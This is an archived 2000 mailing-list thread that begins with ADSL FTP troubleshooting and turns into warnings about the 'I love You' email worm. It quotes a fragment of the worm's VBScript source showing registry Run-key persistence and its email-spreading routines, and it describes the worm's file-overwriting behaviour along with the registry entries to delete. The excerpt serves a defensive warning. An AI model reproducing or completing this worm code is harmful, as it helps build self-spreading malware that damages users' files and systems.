New Zealand ADSL Mailing List


FW: FTP Woes and "I love You"

From: Julian Warren <julian.warren_at_7am.com>
Date: Fri, 5 May 2000 09:50:42 +1200
Message-ID: <002b01bfb612$cbe6a460$0401a8c0@development4>

More:

It looks for all files on local and network drive with the extension .js
.jse .jpg .wsh .sct and .hta. They gate overwritten with a copy of the VB
script and called the same but with and extra .vbs tacked on the end i.e
name.jpg.vbs

Hope this is useful.

Julian

-----Original Message-----
From: Julian Warren [mailto:julian.warren@7am.com]
Sent: Friday, May 05, 2000 9:28 AM
To: 'adsl@freebsddiary.cx'
Subject: FW: FTP Woes and "I love You"

It's slightly worse than I thought. It's a VBS script some of the code of
which is:

"
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)

"

So watch out.

-----Original Message-----
From: Julian Warren [mailto:julian.warren@7am.com]
Sent: Friday, May 05, 2000 9:20 AM
To: 'adsl@freebsddiary.cx'
Subject: FW: FTP Woes and "I love You"

To be more accurate I after my last posting if you are running Outlook
networks:

Lok for:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINDOWS\\Win32DLL.vbs"

(Export it first)

AND NUKE IT!

-----Original Message-----
From: Julian Warren [mailto:julian.warren@7am.com]
Sent: Friday, May 05, 2000 9:10 AM
To: 'adsl@freebsddiary.cx'
Subject: RE: FTP Woes

Dear John,

We can ftp using PASV or without. The snag is that our links don't hold.
They break continuously after a maximum of a few seconds. Clearly it's site
and traffic dependent but we can't do much about that.

Julian

PS We've had the I love you virus. Look in the registry at:

HKeyLocalMachine/Software/Microsoft/CurrentVersion/Runservices/ for a win32
VBS addon and nuke it.

-----Original Message-----
From: John Holley [mailto:j.holley@ucc.co.nz]
Sent: Thursday, May 04, 2000 6:10 PM
To: Julian Warren
Subject: Re: FTP Woes

on 4/5/00 4:34 PM, Julian Warren at julian.warren@7am.com wrote:

> We have a nokia M10 box running into Xtra and it is now set up with a
static
> IP. Previous to this we had to use a dail-up with static IP to get to our
> boxes' FTP server in the US. As far as anyone can determine ftp on the
ADSL
> link before the change to static was OK although we can't be certain.
>

We've had no problem with ftp through our M10 using PASV. I suspect the
problem may be something else.

John

To unsubscribe: send mail to majordomo@freebsddiary.cx
with "unsubscribe adsl" in the body of the message
Received on Fri May 5 08:46:51 2000


This archive was generated by hypermail 2.2.0 : Thu Nov 30 11:48:04 2006 EST